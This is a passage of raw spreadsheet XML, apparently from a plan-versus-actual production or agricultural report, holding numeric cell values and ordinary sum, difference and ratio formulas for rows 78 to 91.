      <c r="D78" s="110">
        <v>5867</v>
      </c>
      <c r="E78" s="71">
        <f t="shared" ref="E78:T78" si="177">E80+E86+E91+E97+E106</f>
        <v>6163.3</v>
      </c>
      <c r="F78" s="110">
        <f t="shared" si="177"/>
        <v>158.9</v>
      </c>
      <c r="G78" s="110">
        <f t="shared" si="177"/>
        <v>900.37</v>
      </c>
      <c r="H78" s="110">
        <f t="shared" si="177"/>
        <v>910.7</v>
      </c>
      <c r="I78" s="110">
        <f t="shared" si="177"/>
        <v>2765.2</v>
      </c>
      <c r="J78" s="110">
        <f t="shared" si="177"/>
        <v>652.13</v>
      </c>
      <c r="K78" s="110">
        <f t="shared" si="177"/>
        <v>624.11</v>
      </c>
      <c r="L78" s="110">
        <f t="shared" si="177"/>
        <v>278.62</v>
      </c>
      <c r="M78" s="111">
        <f>M80+M86+M91+M97+M106</f>
        <v>6290.03</v>
      </c>
      <c r="N78" s="191">
        <f t="shared" si="177"/>
        <v>6530.03</v>
      </c>
      <c r="O78" s="73">
        <f t="shared" si="177"/>
        <v>6617.92</v>
      </c>
      <c r="P78" s="32">
        <f t="shared" si="177"/>
        <v>183.9</v>
      </c>
      <c r="Q78" s="33">
        <v>158.9</v>
      </c>
      <c r="R78" s="112">
        <f t="shared" si="177"/>
        <v>183.9</v>
      </c>
      <c r="S78" s="33">
        <f>R78-Q78</f>
        <v>25</v>
      </c>
      <c r="T78" s="112">
        <f t="shared" si="177"/>
        <v>947.37</v>
      </c>
      <c r="U78" s="112">
        <v>900.37</v>
      </c>
      <c r="V78" s="112">
        <f t="shared" ref="V78:AL78" si="178">V80+V86+V91+V97+V106</f>
        <v>941.47</v>
      </c>
      <c r="W78" s="33">
        <f>V78-U78</f>
        <v>41.100000000000023</v>
      </c>
      <c r="X78" s="112">
        <f t="shared" si="178"/>
        <v>944.7</v>
      </c>
      <c r="Y78" s="112">
        <v>910.7</v>
      </c>
      <c r="Z78" s="112">
        <f t="shared" si="178"/>
        <v>954.80000000000007</v>
      </c>
      <c r="AA78" s="33">
        <f>Z78-Y78</f>
        <v>44.100000000000023</v>
      </c>
      <c r="AB78" s="112">
        <f t="shared" si="178"/>
        <v>2808.2</v>
      </c>
      <c r="AC78" s="112"/>
      <c r="AD78" s="112">
        <f t="shared" si="178"/>
        <v>2835.2499999999995</v>
      </c>
      <c r="AE78" s="33">
        <f>AD78-I78</f>
        <v>70.049999999999727</v>
      </c>
      <c r="AF78" s="112">
        <f t="shared" si="178"/>
        <v>688.23</v>
      </c>
      <c r="AG78" s="112">
        <f t="shared" si="178"/>
        <v>681.16</v>
      </c>
      <c r="AH78" s="33">
        <f>AG78-J78</f>
        <v>29.029999999999973</v>
      </c>
      <c r="AI78" s="112">
        <f t="shared" si="178"/>
        <v>648.01</v>
      </c>
      <c r="AJ78" s="112">
        <f>AJ80+AJ86+AJ91+AJ97+AJ106</f>
        <v>683.5200000000001</v>
      </c>
      <c r="AK78" s="33">
        <f>AJ78-K78</f>
        <v>59.410000000000082</v>
      </c>
      <c r="AL78" s="112">
        <f t="shared" si="178"/>
        <v>309.62</v>
      </c>
      <c r="AM78" s="112">
        <f>AM80+AM86+AM91+AM97+AM106</f>
        <v>337.82</v>
      </c>
      <c r="AN78" s="73">
        <f>AM78-L78</f>
        <v>59.199999999999989</v>
      </c>
      <c r="AO78" s="73">
        <f>O78/N78*100</f>
        <v>101.34593562357294</v>
      </c>
      <c r="AP78" s="74">
        <f>O78-M78</f>
        <v>327.89000000000033</v>
      </c>
      <c r="AQ78" s="113"/>
    </row>
    <row r="79" spans="1:43" ht="22.5" customHeight="1">
      <c r="A79" s="92">
        <v>1</v>
      </c>
      <c r="B79" s="93" t="s">
        <v>21</v>
      </c>
      <c r="C79" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D79" s="89"/>
      <c r="E79" s="71"/>
      <c r="F79" s="89"/>
      <c r="G79" s="89"/>
      <c r="H79" s="89"/>
      <c r="I79" s="89"/>
      <c r="J79" s="89"/>
      <c r="K79" s="89"/>
      <c r="L79" s="89"/>
      <c r="M79" s="85"/>
      <c r="N79" s="98"/>
      <c r="O79" s="73"/>
      <c r="P79" s="11"/>
      <c r="Q79" s="12"/>
      <c r="R79" s="87"/>
      <c r="S79" s="12"/>
      <c r="T79" s="11"/>
      <c r="U79" s="12"/>
      <c r="V79" s="87"/>
      <c r="W79" s="12"/>
      <c r="X79" s="11"/>
      <c r="Y79" s="12"/>
      <c r="Z79" s="87"/>
      <c r="AA79" s="12"/>
      <c r="AB79" s="11"/>
      <c r="AC79" s="12"/>
      <c r="AD79" s="87"/>
      <c r="AE79" s="12"/>
      <c r="AF79" s="11"/>
      <c r="AG79" s="87"/>
      <c r="AH79" s="12"/>
      <c r="AI79" s="11"/>
      <c r="AJ79" s="87"/>
      <c r="AK79" s="12"/>
      <c r="AL79" s="11"/>
      <c r="AM79" s="87"/>
      <c r="AN79" s="87"/>
      <c r="AO79" s="87"/>
      <c r="AP79" s="74"/>
      <c r="AQ79" s="91"/>
    </row>
    <row r="80" spans="1:43" ht="22.5" customHeight="1">
      <c r="A80" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B80" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C80" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D80" s="89">
        <v>825</v>
      </c>
      <c r="E80" s="83">
        <v>825.3</v>
      </c>
      <c r="F80" s="89">
        <v>38.299999999999997</v>
      </c>
      <c r="G80" s="89">
        <v>49</v>
      </c>
      <c r="H80" s="89">
        <v>73</v>
      </c>
      <c r="I80" s="89">
        <f>60+I84</f>
        <v>61</v>
      </c>
      <c r="J80" s="89">
        <f>233+14</f>
        <v>247</v>
      </c>
      <c r="K80" s="89">
        <f>256+45.2</f>
        <v>301.2</v>
      </c>
      <c r="L80" s="89">
        <f>116+L84</f>
        <v>119</v>
      </c>
      <c r="M80" s="85">
        <v>888.5</v>
      </c>
      <c r="N80" s="98">
        <f>P80+T80+X80+AB80+AF80+AI80+AL80</f>
        <v>888.5</v>
      </c>
      <c r="O80" s="86">
        <f>R80+V80+Z80+AD80+AG80+AJ80+AM80</f>
        <v>931.48</v>
      </c>
      <c r="P80" s="11">
        <v>38.299999999999997</v>
      </c>
      <c r="Q80" s="12">
        <v>38.299999999999997</v>
      </c>
      <c r="R80" s="87">
        <v>38.299999999999997</v>
      </c>
      <c r="S80" s="12"/>
      <c r="T80" s="11">
        <v>49</v>
      </c>
      <c r="U80" s="12">
        <v>49</v>
      </c>
      <c r="V80" s="87">
        <v>49</v>
      </c>
      <c r="W80" s="12"/>
      <c r="X80" s="11">
        <v>73</v>
      </c>
      <c r="Y80" s="12">
        <v>73</v>
      </c>
      <c r="Z80" s="87">
        <v>73</v>
      </c>
      <c r="AA80" s="12"/>
      <c r="AB80" s="11">
        <v>61</v>
      </c>
      <c r="AC80" s="12"/>
      <c r="AD80" s="87">
        <f>60+1</f>
        <v>61</v>
      </c>
      <c r="AE80" s="12"/>
      <c r="AF80" s="11">
        <v>247</v>
      </c>
      <c r="AG80" s="87">
        <f>233+14</f>
        <v>247</v>
      </c>
      <c r="AH80" s="12"/>
      <c r="AI80" s="11">
        <v>301.2</v>
      </c>
      <c r="AJ80" s="87">
        <f>301.2+14.98+16.38</f>
        <v>332.56</v>
      </c>
      <c r="AK80" s="12"/>
      <c r="AL80" s="11">
        <v>119</v>
      </c>
      <c r="AM80" s="87">
        <f>119+7+4.62</f>
        <v>130.62</v>
      </c>
      <c r="AN80" s="87"/>
      <c r="AO80" s="73">
        <f>O80/N80*100</f>
        <v>104.83736634777716</v>
      </c>
      <c r="AP80" s="74">
        <f>O80-M80</f>
        <v>42.980000000000018</v>
      </c>
      <c r="AQ80" s="91"/>
    </row>
    <row r="81" spans="1:43" ht="22.5" customHeight="1">
      <c r="A81" s="68" t="s">
        <v>3</v>
      </c>
      <c r="B81" s="81" t="s">
        <v>74</v>
      </c>
      <c r="C81" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D81" s="89">
        <v>513</v>
      </c>
      <c r="E81" s="83">
        <v>562</v>
      </c>
      <c r="F81" s="89">
        <v>18</v>
      </c>
      <c r="G81" s="89">
        <v>34</v>
      </c>
      <c r="H81" s="89">
        <v>25</v>
      </c>
      <c r="I81" s="89">
        <v>35</v>
      </c>
      <c r="J81" s="89">
        <v>115</v>
      </c>
      <c r="K81" s="89">
        <v>230</v>
      </c>
      <c r="L81" s="89">
        <v>105</v>
      </c>
      <c r="M81" s="85">
        <v>513.4</v>
      </c>
      <c r="N81" s="98">
        <f>P81+T81+X81+AB81+AF81+AI81+AL81</f>
        <v>731</v>
      </c>
      <c r="O81" s="86">
        <f>R81+V81+Z81+AD81+AG81+AJ81+AM81</f>
        <v>599.75</v>
      </c>
      <c r="P81" s="11">
        <v>26</v>
      </c>
      <c r="Q81" s="12">
        <v>18</v>
      </c>
      <c r="R81" s="87">
        <v>20.25</v>
      </c>
      <c r="S81" s="12"/>
      <c r="T81" s="11">
        <v>45</v>
      </c>
      <c r="U81" s="12">
        <v>34</v>
      </c>
      <c r="V81" s="87">
        <f>35.2-5</f>
        <v>30.200000000000003</v>
      </c>
      <c r="W81" s="12"/>
      <c r="X81" s="11">
        <v>60</v>
      </c>
      <c r="Y81" s="12">
        <v>25</v>
      </c>
      <c r="Z81" s="87">
        <f>54.6-10</f>
        <v>44.6</v>
      </c>
      <c r="AA81" s="12"/>
      <c r="AB81" s="11">
        <v>55</v>
      </c>
      <c r="AC81" s="12"/>
      <c r="AD81" s="87">
        <v>45</v>
      </c>
      <c r="AE81" s="12"/>
      <c r="AF81" s="11">
        <v>200</v>
      </c>
      <c r="AG81" s="87">
        <f>186.1-15</f>
        <v>171.1</v>
      </c>
      <c r="AH81" s="12"/>
      <c r="AI81" s="11">
        <v>240</v>
      </c>
      <c r="AJ81" s="87">
        <f>223.4-20</f>
        <v>203.4</v>
      </c>
      <c r="AK81" s="12"/>
      <c r="AL81" s="11">
        <v>105</v>
      </c>
      <c r="AM81" s="87">
        <f>98.2-13</f>
        <v>85.2</v>
      </c>
      <c r="AN81" s="87"/>
      <c r="AO81" s="73">
        <f>O81/N81*100</f>
        <v>82.045143638850888</v>
      </c>
      <c r="AP81" s="74">
        <f>O81-M81</f>
        <v>86.350000000000023</v>
      </c>
      <c r="AQ81" s="91"/>
    </row>
    <row r="82" spans="1:43" ht="22.5" customHeight="1">
      <c r="A82" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B82" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C82" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D82" s="89">
        <v>10</v>
      </c>
      <c r="E82" s="83">
        <f>E83/E81*10</f>
        <v>9.795373665480426</v>
      </c>
      <c r="F82" s="89">
        <v>8</v>
      </c>
      <c r="G82" s="89">
        <v>9</v>
      </c>
      <c r="H82" s="89">
        <v>9</v>
      </c>
      <c r="I82" s="89">
        <v>9</v>
      </c>
      <c r="J82" s="89">
        <v>11</v>
      </c>
      <c r="K82" s="89">
        <v>11</v>
      </c>
      <c r="L82" s="89">
        <v>9</v>
      </c>
      <c r="M82" s="85"/>
      <c r="N82" s="98">
        <f>N83/N81*10</f>
        <v>0.32010943912448697</v>
      </c>
      <c r="O82" s="86">
        <f>O83/O81*10</f>
        <v>0</v>
      </c>
      <c r="P82" s="11">
        <v>9</v>
      </c>
      <c r="Q82" s="12">
        <v>8</v>
      </c>
      <c r="R82" s="87"/>
      <c r="S82" s="12"/>
      <c r="T82" s="11"/>
      <c r="U82" s="12"/>
      <c r="V82" s="87"/>
      <c r="W82" s="12"/>
      <c r="X82" s="11"/>
      <c r="Y82" s="12"/>
      <c r="Z82" s="87"/>
      <c r="AA82" s="12"/>
      <c r="AB82" s="11"/>
      <c r="AC82" s="12"/>
      <c r="AD82" s="87"/>
      <c r="AE82" s="12"/>
      <c r="AF82" s="11"/>
      <c r="AG82" s="87"/>
      <c r="AH82" s="12"/>
      <c r="AI82" s="11"/>
      <c r="AJ82" s="87"/>
      <c r="AK82" s="12"/>
      <c r="AL82" s="11"/>
      <c r="AM82" s="87"/>
      <c r="AN82" s="87"/>
      <c r="AO82" s="87"/>
      <c r="AP82" s="74"/>
      <c r="AQ82" s="91"/>
    </row>
    <row r="83" spans="1:43" ht="22.5" customHeight="1">
      <c r="A83" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B83" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C83" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D83" s="89">
        <v>509</v>
      </c>
      <c r="E83" s="83">
        <v>550.5</v>
      </c>
      <c r="F83" s="89">
        <f t="shared" ref="F83:G83" si="179">F82*F81/10</f>
        <v>14.4</v>
      </c>
      <c r="G83" s="89">
        <f t="shared" si="179"/>
        <v>30.6</v>
      </c>
      <c r="H83" s="89">
        <v>0</v>
      </c>
      <c r="I83" s="89">
        <f>I82*I81/10</f>
        <v>31.5</v>
      </c>
      <c r="J83" s="89">
        <f t="shared" ref="J83:L83" si="180">J82*J81/10</f>
        <v>126.5</v>
      </c>
      <c r="K83" s="89">
        <f t="shared" si="180"/>
        <v>253</v>
      </c>
      <c r="L83" s="89">
        <f t="shared" si="180"/>
        <v>94.5</v>
      </c>
      <c r="M83" s="85"/>
      <c r="N83" s="98">
        <f>P83+T83+X83+AB83+AF83+AI83+AL83</f>
        <v>23.4</v>
      </c>
      <c r="O83" s="86">
        <f>R83+V83+Z83+AD83+AG83+AJ83+AM83</f>
        <v>0</v>
      </c>
      <c r="P83" s="11">
        <f>P82*P81/10</f>
        <v>23.4</v>
      </c>
      <c r="Q83" s="11">
        <v>14.4</v>
      </c>
      <c r="R83" s="11"/>
      <c r="S83" s="11"/>
      <c r="T83" s="11"/>
      <c r="U83" s="12"/>
      <c r="V83" s="87"/>
      <c r="W83" s="87"/>
      <c r="X83" s="87"/>
      <c r="Y83" s="87"/>
      <c r="Z83" s="87"/>
      <c r="AA83" s="12"/>
      <c r="AB83" s="11"/>
      <c r="AC83" s="12"/>
      <c r="AD83" s="87"/>
      <c r="AE83" s="12"/>
      <c r="AF83" s="11"/>
      <c r="AG83" s="87"/>
      <c r="AH83" s="12"/>
      <c r="AI83" s="11"/>
      <c r="AJ83" s="87"/>
      <c r="AK83" s="12"/>
      <c r="AL83" s="11"/>
      <c r="AM83" s="87"/>
      <c r="AN83" s="87"/>
      <c r="AO83" s="87"/>
      <c r="AP83" s="74"/>
      <c r="AQ83" s="91"/>
    </row>
    <row r="84" spans="1:43" s="195" customFormat="1" ht="22.5" customHeight="1">
      <c r="A84" s="102" t="s">
        <v>3</v>
      </c>
      <c r="B84" s="101" t="s">
        <v>82</v>
      </c>
      <c r="C84" s="114" t="s">
        <v>1</v>
      </c>
      <c r="D84" s="104">
        <v>17</v>
      </c>
      <c r="E84" s="71"/>
      <c r="F84" s="104"/>
      <c r="G84" s="104"/>
      <c r="H84" s="104"/>
      <c r="I84" s="104">
        <v>1</v>
      </c>
      <c r="J84" s="104">
        <v>14</v>
      </c>
      <c r="K84" s="104">
        <v>45.2</v>
      </c>
      <c r="L84" s="104">
        <v>3</v>
      </c>
      <c r="M84" s="105"/>
      <c r="N84" s="196"/>
      <c r="O84" s="86">
        <f>R84+V84+Z84+AD84+AG84+AJ84+AM84</f>
        <v>42.980000000000004</v>
      </c>
      <c r="P84" s="38"/>
      <c r="Q84" s="39"/>
      <c r="R84" s="106"/>
      <c r="S84" s="39"/>
      <c r="T84" s="38"/>
      <c r="U84" s="39"/>
      <c r="V84" s="106"/>
      <c r="W84" s="39"/>
      <c r="X84" s="38"/>
      <c r="Y84" s="39"/>
      <c r="Z84" s="106"/>
      <c r="AA84" s="39"/>
      <c r="AB84" s="38"/>
      <c r="AC84" s="39"/>
      <c r="AD84" s="106"/>
      <c r="AE84" s="39"/>
      <c r="AF84" s="38"/>
      <c r="AG84" s="106"/>
      <c r="AH84" s="39"/>
      <c r="AI84" s="38"/>
      <c r="AJ84" s="106">
        <f>14.98+16.38</f>
        <v>31.36</v>
      </c>
      <c r="AK84" s="39"/>
      <c r="AL84" s="38"/>
      <c r="AM84" s="106">
        <f>7+4.62</f>
        <v>11.620000000000001</v>
      </c>
      <c r="AN84" s="106"/>
      <c r="AO84" s="106"/>
      <c r="AP84" s="74"/>
      <c r="AQ84" s="107"/>
    </row>
    <row r="85" spans="1:43" ht="22.5" customHeight="1">
      <c r="A85" s="92">
        <v>2</v>
      </c>
      <c r="B85" s="93" t="s">
        <v>22</v>
      </c>
      <c r="C85" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D85" s="89"/>
      <c r="E85" s="71"/>
      <c r="F85" s="89"/>
      <c r="G85" s="89"/>
      <c r="H85" s="89"/>
      <c r="I85" s="89"/>
      <c r="J85" s="89"/>
      <c r="K85" s="89"/>
      <c r="L85" s="89"/>
      <c r="M85" s="85"/>
      <c r="N85" s="98"/>
      <c r="O85" s="73"/>
      <c r="P85" s="11"/>
      <c r="Q85" s="12"/>
      <c r="R85" s="87"/>
      <c r="S85" s="12"/>
      <c r="T85" s="11"/>
      <c r="U85" s="12"/>
      <c r="V85" s="87"/>
      <c r="W85" s="12"/>
      <c r="X85" s="11"/>
      <c r="Y85" s="12"/>
      <c r="Z85" s="87"/>
      <c r="AA85" s="12"/>
      <c r="AB85" s="11"/>
      <c r="AC85" s="12"/>
      <c r="AD85" s="87"/>
      <c r="AE85" s="12"/>
      <c r="AF85" s="11"/>
      <c r="AG85" s="87"/>
      <c r="AH85" s="12"/>
      <c r="AI85" s="11"/>
      <c r="AJ85" s="87"/>
      <c r="AK85" s="12"/>
      <c r="AL85" s="11"/>
      <c r="AM85" s="87"/>
      <c r="AN85" s="87"/>
      <c r="AO85" s="87"/>
      <c r="AP85" s="74"/>
      <c r="AQ85" s="91"/>
    </row>
    <row r="86" spans="1:43" ht="22.5" customHeight="1">
      <c r="A86" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B86" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C86" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D86" s="89">
        <v>62</v>
      </c>
      <c r="E86" s="83">
        <v>62.36</v>
      </c>
      <c r="F86" s="89">
        <v>2</v>
      </c>
      <c r="G86" s="89">
        <v>3.2</v>
      </c>
      <c r="H86" s="89">
        <f>0+H89</f>
        <v>0</v>
      </c>
      <c r="I86" s="89">
        <v>10.6</v>
      </c>
      <c r="J86" s="89">
        <v>21.36</v>
      </c>
      <c r="K86" s="89">
        <f>21.7+0.1</f>
        <v>21.8</v>
      </c>
      <c r="L86" s="89">
        <v>3.5</v>
      </c>
      <c r="M86" s="90">
        <v>62.46</v>
      </c>
      <c r="N86" s="98">
        <f>P86+T86+X86+AB86+AF86+AI86+AL86</f>
        <v>62.460000000000008</v>
      </c>
      <c r="O86" s="86">
        <f>R86+V86+Z86+AD86+AG86+AJ86+AM86</f>
        <v>62.459999999999994</v>
      </c>
      <c r="P86" s="11">
        <v>2</v>
      </c>
      <c r="Q86" s="12">
        <v>2</v>
      </c>
      <c r="R86" s="87">
        <v>2</v>
      </c>
      <c r="S86" s="12"/>
      <c r="T86" s="11">
        <v>3.2</v>
      </c>
      <c r="U86" s="12">
        <v>3.2</v>
      </c>
      <c r="V86" s="87">
        <v>3.2</v>
      </c>
      <c r="W86" s="12"/>
      <c r="X86" s="11">
        <f>0+X89</f>
        <v>0</v>
      </c>
      <c r="Y86" s="12">
        <v>0</v>
      </c>
      <c r="Z86" s="87">
        <f>0+Z89</f>
        <v>0</v>
      </c>
      <c r="AA86" s="12"/>
      <c r="AB86" s="11">
        <v>10.6</v>
      </c>
      <c r="AC86" s="12"/>
      <c r="AD86" s="87">
        <v>10.6</v>
      </c>
      <c r="AE86" s="12"/>
      <c r="AF86" s="11">
        <f>21.36+0.1</f>
        <v>21.46</v>
      </c>
      <c r="AG86" s="87">
        <v>21.36</v>
      </c>
      <c r="AH86" s="12"/>
      <c r="AI86" s="11">
        <v>21.7</v>
      </c>
      <c r="AJ86" s="87">
        <f>21.7+0.1</f>
        <v>21.8</v>
      </c>
      <c r="AK86" s="12"/>
      <c r="AL86" s="11">
        <v>3.5</v>
      </c>
      <c r="AM86" s="87">
        <v>3.5</v>
      </c>
      <c r="AN86" s="87"/>
      <c r="AO86" s="73">
        <f>O86/N86*100</f>
        <v>99.999999999999972</v>
      </c>
      <c r="AP86" s="74">
        <f>O86-M86</f>
        <v>0</v>
      </c>
      <c r="AQ86" s="91"/>
    </row>
    <row r="87" spans="1:43" ht="22.5" customHeight="1">
      <c r="A87" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B87" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C87" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D87" s="89">
        <v>15</v>
      </c>
      <c r="E87" s="83">
        <f>E88/E86*10</f>
        <v>15.571840923669019</v>
      </c>
      <c r="F87" s="89">
        <v>15</v>
      </c>
      <c r="G87" s="89">
        <v>16</v>
      </c>
      <c r="H87" s="89">
        <v>0</v>
      </c>
      <c r="I87" s="89">
        <v>14</v>
      </c>
      <c r="J87" s="89">
        <v>16</v>
      </c>
      <c r="K87" s="89">
        <v>16</v>
      </c>
      <c r="L87" s="89">
        <v>15</v>
      </c>
      <c r="M87" s="90">
        <f>M88/M86*10</f>
        <v>15.547550432276658</v>
      </c>
      <c r="N87" s="98">
        <f>N88/N86*10</f>
        <v>15.572526416906818</v>
      </c>
      <c r="O87" s="86">
        <f>O88/O86*10</f>
        <v>15.572526416906822</v>
      </c>
      <c r="P87" s="11">
        <v>15</v>
      </c>
      <c r="Q87" s="12">
        <v>15</v>
      </c>
      <c r="R87" s="87">
        <v>15</v>
      </c>
      <c r="S87" s="12"/>
      <c r="T87" s="11">
        <v>16</v>
      </c>
      <c r="U87" s="12">
        <v>16</v>
      </c>
      <c r="V87" s="87">
        <v>16</v>
      </c>
      <c r="W87" s="12"/>
      <c r="X87" s="11"/>
      <c r="Y87" s="12">
        <v>0</v>
      </c>
      <c r="Z87" s="87">
        <v>0</v>
      </c>
      <c r="AA87" s="12"/>
      <c r="AB87" s="11">
        <v>14</v>
      </c>
      <c r="AC87" s="12"/>
      <c r="AD87" s="87">
        <v>14</v>
      </c>
      <c r="AE87" s="12"/>
      <c r="AF87" s="11">
        <v>16</v>
      </c>
      <c r="AG87" s="87">
        <v>16</v>
      </c>
      <c r="AH87" s="12"/>
      <c r="AI87" s="11">
        <v>16</v>
      </c>
      <c r="AJ87" s="87">
        <v>16</v>
      </c>
      <c r="AK87" s="12"/>
      <c r="AL87" s="11">
        <v>15</v>
      </c>
      <c r="AM87" s="87">
        <v>15</v>
      </c>
      <c r="AN87" s="87"/>
      <c r="AO87" s="73"/>
      <c r="AP87" s="74"/>
      <c r="AQ87" s="91"/>
    </row>
    <row r="88" spans="1:43" ht="22.5" customHeight="1">
      <c r="A88" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B88" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C88" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D88" s="89">
        <v>97</v>
      </c>
      <c r="E88" s="83">
        <v>97.105999999999995</v>
      </c>
      <c r="F88" s="89">
        <f t="shared" ref="F88:L88" si="181">F87*F86/10</f>
        <v>3</v>
      </c>
      <c r="G88" s="89">
        <f t="shared" si="181"/>
        <v>5.12</v>
      </c>
      <c r="H88" s="89">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
      <c r="I88" s="89">
        <f t="shared" si="181"/>
        <v>14.84</v>
      </c>
      <c r="J88" s="89">
        <f t="shared" si="181"/>
        <v>34.176000000000002</v>
      </c>
      <c r="K88" s="89">
        <f t="shared" si="181"/>
        <v>34.880000000000003</v>
      </c>
      <c r="L88" s="89">
        <f t="shared" si="181"/>
        <v>5.25</v>
      </c>
      <c r="M88" s="90">
        <v>97.11</v>
      </c>
      <c r="N88" s="98">
        <f>P88+T88+X88+AB88+AF88+AI88+AL88</f>
        <v>97.265999999999991</v>
      </c>
      <c r="O88" s="86">
        <f>R88+V88+Z88+AD88+AG88+AJ88+AM88</f>
        <v>97.266000000000005</v>
      </c>
      <c r="P88" s="11">
        <f t="shared" ref="P88" si="182">P87*P86/10</f>
        <v>3</v>
      </c>
      <c r="Q88" s="12">
        <v>3</v>
      </c>
      <c r="R88" s="87">
        <f t="shared" ref="R88:T88" si="183">R87*R86/10</f>
        <v>3</v>
      </c>
      <c r="S88" s="12"/>
      <c r="T88" s="11">
        <f t="shared" si="183"/>
        <v>5.12</v>
      </c>
      <c r="U88" s="12">
        <v>5.12</v>
      </c>
      <c r="V88" s="87">
        <f t="shared" ref="V88:X88" si="184">V87*V86/10</f>
        <v>5.12</v>
      </c>
      <c r="W88" s="12"/>
      <c r="X88" s="11">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="Y88" s="12">
        <v>0</v>
      </c>
      <c r="Z88" s="87">
        <f t="shared" ref="Z88:AB88" si="185">Z87*Z86/10</f>
        <v>0</v>
      </c>
      <c r="AA88" s="12"/>
      <c r="AB88" s="11">
        <f t="shared" si="185"/>
        <v>14.84</v>
      </c>
      <c r="AC88" s="12"/>
      <c r="AD88" s="87">
        <f t="shared" ref="AD88:AF88" si="186">AD87*AD86/10</f>
        <v>14.84</v>
      </c>
      <c r="AE88" s="12"/>
      <c r="AF88" s="11">
        <f t="shared" si="186"/>
        <v>34.335999999999999</v>
      </c>
      <c r="AG88" s="87">
        <f t="shared" ref="AG88:AI88" si="187">AG87*AG86/10</f>
        <v>34.176000000000002</v>
      </c>
      <c r="AH88" s="12"/>
      <c r="AI88" s="11">
        <f t="shared" si="187"/>
        <v>34.72</v>
      </c>
      <c r="AJ88" s="87">
        <f t="shared" ref="AJ88:AL88" si="188">AJ87*AJ86/10</f>
        <v>34.880000000000003</v>
      </c>
      <c r="AK88" s="12"/>
      <c r="AL88" s="11">
        <f t="shared" si="188"/>
        <v>5.25</v>
      </c>
      <c r="AM88" s="87">
        <f t="shared" ref="AM88" si="189">AM87*AM86/10</f>
        <v>5.25</v>
      </c>
      <c r="AN88" s="87"/>
      <c r="AO88" s="73"/>
      <c r="AP88" s="74"/>
      <c r="AQ88" s="91"/>
    </row>
    <row r="89" spans="1:43" ht="22.5" customHeight="1">
      <c r="A89" s="68"/>
      <c r="B89" s="101" t="s">
        <v>71</v>
      </c>
      <c r="C89" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D89" s="89">
        <v>1</v>
      </c>
      <c r="E89" s="71"/>
      <c r="F89" s="89"/>
      <c r="G89" s="89"/>
      <c r="H89" s="89"/>
      <c r="I89" s="89"/>
      <c r="J89" s="89"/>
      <c r="K89" s="89">
        <v>0.1</v>
      </c>
      <c r="L89" s="89"/>
      <c r="M89" s="85"/>
      <c r="N89" s="98"/>
      <c r="O89" s="73"/>
      <c r="P89" s="11"/>
      <c r="Q89" s="12"/>
      <c r="R89" s="87"/>
      <c r="S89" s="12"/>
      <c r="T89" s="11"/>
      <c r="U89" s="12"/>
      <c r="V89" s="87"/>
      <c r="W89" s="12"/>
      <c r="X89" s="11"/>
      <c r="Y89" s="12"/>
      <c r="Z89" s="87"/>
      <c r="AA89" s="12"/>
      <c r="AB89" s="11"/>
      <c r="AC89" s="12"/>
      <c r="AD89" s="87"/>
      <c r="AE89" s="12"/>
      <c r="AF89" s="11"/>
      <c r="AG89" s="87"/>
      <c r="AH89" s="12"/>
      <c r="AI89" s="11"/>
      <c r="AJ89" s="87"/>
      <c r="AK89" s="12"/>
      <c r="AL89" s="11"/>
      <c r="AM89" s="87"/>
      <c r="AN89" s="87"/>
      <c r="AO89" s="87"/>
      <c r="AP89" s="74"/>
      <c r="AQ89" s="91"/>
    </row>
    <row r="90" spans="1:43" ht="22.5" customHeight="1">
      <c r="A90" s="92">
        <v>3</v>
      </c>
      <c r="B90" s="93" t="s">
        <v>23</v>
      </c>
      <c r="C90" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D90" s="89"/>
      <c r="E90" s="71"/>
      <c r="F90" s="89"/>
      <c r="G90" s="89"/>
      <c r="H90" s="89"/>
      <c r="I90" s="89"/>
      <c r="J90" s="89"/>
      <c r="K90" s="89"/>
      <c r="L90" s="89"/>
      <c r="M90" s="85"/>
      <c r="N90" s="98"/>
      <c r="O90" s="73"/>
      <c r="P90" s="11"/>
      <c r="Q90" s="12"/>
      <c r="R90" s="87"/>
      <c r="S90" s="12"/>
      <c r="T90" s="11"/>
      <c r="U90" s="12"/>
      <c r="V90" s="87"/>
      <c r="W90" s="12"/>
      <c r="X90" s="11"/>
      <c r="Y90" s="12"/>
      <c r="Z90" s="87"/>
      <c r="AA90" s="12"/>
      <c r="AB90" s="11"/>
      <c r="AC90" s="12"/>
      <c r="AD90" s="87"/>
      <c r="AE90" s="12"/>
      <c r="AF90" s="11"/>
      <c r="AG90" s="87"/>
      <c r="AH90" s="12"/>
      <c r="AI90" s="11"/>
      <c r="AJ90" s="87"/>
      <c r="AK90" s="12"/>
      <c r="AL90" s="11"/>
      <c r="AM90" s="87">
        <f>AM91-AM93</f>
        <v>0</v>
      </c>
      <c r="AN90" s="87"/>
      <c r="AO90" s="87"/>
      <c r="AP90" s="74"/>
      <c r="AQ90" s="91"/>
    </row>
    <row r="91" spans="1:43" ht="22.5" customHeight="1">
      <c r="A91" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B91" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C91" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D91" s="89">
        <v>3605</v>
      </c>
      <c r="E91" s="83">
        <v>3605.1</v>
      </c>
      <c r="F91" s="89">
        <v>5</v>
      </c>
      <c r="G91" s="89">
        <v>651</v>
      </c>
